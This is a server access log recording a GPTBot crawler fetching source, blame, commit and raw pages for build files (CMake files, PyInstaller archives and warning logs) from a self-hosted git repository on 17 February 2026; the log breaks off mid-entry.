"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:14:52:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14856] [Gzip 9.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:14:52:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 9926] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:14:52:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 10419] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:14:52:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 162] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:14:52:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9984] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:14:53:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" [Client 74.7.227.38] [Length 14234] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot" -[17/Feb/2026:14:53:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 9927] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:14:53:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 10419] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:14:53:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 162] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:14:53:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 13827] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:14:53:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 14997] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:14:53:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 13825] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:14:53:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 13828] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:14:53:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" [Client 74.7.227.38] [Length 14264] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot" -[17/Feb/2026:14:53:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 14965] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:14:53:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 10956] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:14:53:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 14994] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:14:53:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 10919] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:14:53:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 20143] [Gzip 9.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:14:53:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" [Client 74.7.227.38] [Length 9884] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" -[17/Feb/2026:14:53:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 10209] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:14:53:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 10414] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:14:53:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 10212] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:14:53:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 10210] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:14:53:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 4648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:14:53:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 14294] [Gzip 8.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:14:53:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -[17/Feb/2026:14:53:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 10415] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:14:53:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 9929] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:14:53:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 10210] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:14:53:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 9929] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -[17/Feb/2026:14:53:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" [Client 74.7.227.38] [Length 14115] [Gzip 6.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" -[17/Feb/2026:14:53:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 4648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:14:53:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 14294] [Gzip 8.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:14:53:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 1154321] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -[17/Feb/2026:14:53:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 16630] [Gzip 8.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:14:53:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" [Client 74.7.227.38] [Length 8077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" -[17/Feb/2026:14:53:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 6417] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:14:53:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 13914] [Gzip 8.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:14:53:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 3599806] [Gzip 11.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -[17/Feb/2026:14:53:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 14995] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:14:53:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" [Client 74.7.227.38] [Length 14265] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor" -[17/Feb/2026:14:53:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 15357] [Gzip 9.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:14:53:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 3599818] [Gzip 11.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -[17/Feb/2026:14:53:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 23482] [Gzip 19.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:14:53:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" [Client 74.7.227.38] [Length 8077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" -[17/Feb/2026:14:53:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" [Client 74.7.227.38] [Length 14084] [Gzip 6.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" -[17/Feb/2026:14:53:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 6417] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, 